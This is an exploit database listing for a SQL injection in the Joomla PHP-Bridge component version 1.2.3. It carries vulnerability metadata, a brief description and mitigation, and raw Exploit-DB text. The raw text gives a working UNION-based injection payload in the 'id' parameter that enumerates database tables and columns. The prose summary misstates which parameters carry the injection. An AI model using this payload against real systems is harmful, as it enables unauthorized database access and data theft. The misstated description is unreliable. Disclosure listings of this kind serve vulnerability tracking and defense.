Joomla! Component PHP-Bridge v1.2.3 - SQL Injection

vendor:

Joomla! Component PHP-Bridge

by:

Ihsan Sencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla! Component PHP-Bridge

Affected Version From: 1.2.3

Affected Version To: 1.2.3

Patch Exists: NO

Related CWE: N/A

CPE: a:henryschorradt:joomla_php_bridge:1.2.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

Joomla! Component PHP-Bridge v1.2.3 – SQL Injection

An attacker can exploit a SQL injection vulnerability in Joomla! Component PHP-Bridge v1.2.3 by sending a specially crafted HTTP request to the vulnerable application. The attacker can use the ‘option’ and ‘view’ parameters to inject malicious SQL code into the application. The attacker can then use the ‘id’ parameter to execute the malicious SQL code.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://www.henryschorradt.de/
# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
# Demo: http://www.henryschorradt.de/joomla-php-bridge/
# Version: 1.2.3
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
# Etc..
# # # # #